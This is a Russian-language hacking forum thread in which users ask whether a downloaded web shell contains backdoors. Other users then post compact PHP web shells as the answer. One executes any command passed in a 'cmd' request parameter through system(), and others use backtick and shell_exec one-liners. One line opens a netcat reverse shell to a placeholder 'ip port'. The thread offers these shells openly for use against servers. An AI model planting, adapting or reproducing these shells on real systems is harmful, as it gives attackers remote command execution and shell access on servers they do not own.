ArsenalWest
Member
- 19.03.2020
- 9
- 0
Держи проверенный, вшитых бэкдоров и стучалок нет.Ссылка скрыта от гостейКто имеет возможность проверьте плз, нет ли вшитых бэкдоров, пожалуйста.
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
Можно еще меньшеДержи проверенный, вшитых бэкдоров и стучалок нет.
PHP:<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
<?=@`` ?>
<?=@shell_exec() ?>
<?= @`nc ip port -e /bin/sh` ?>
Можно еще меньше
Данный код эквивалентен кодуPHP:<?=@`` ?>
PHP:<?=@shell_exec() ?>
Никто подобным заниматься не будет(по чьей-то просьбе). Тем более за бесплатно. + подумай сам, если я даже там найду бэкдор. Зачем мне об этом говорить )Ссылка скрыта от гостейКто имеет возможность проверьте плз, нет ли вшитых бэкдоров, пожалуйста.
Вроде как раз в старых доках это и было описано или еще где-то не помню уже. Но вообще смотри старые темы античата и рдот в том числе. Старые мемберы много чего придумали и изучили.А где можно про это почитать? НаСсылка скрыта от гостейи на sof так себе доркается, по античату тоже(втч с байпасом)... нужно "стараться" лучше или я копаю в неправильном направлении?
Можно ссыль на офдоки\статью\книгу, плз?
Ну так пройти мимо уже не вариант? Тема явно не для таких как ты создана.Тем более за бесплатно. + подумай сам, если я даже там найду бэкдор. Зачем мне об этом говорить )
Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab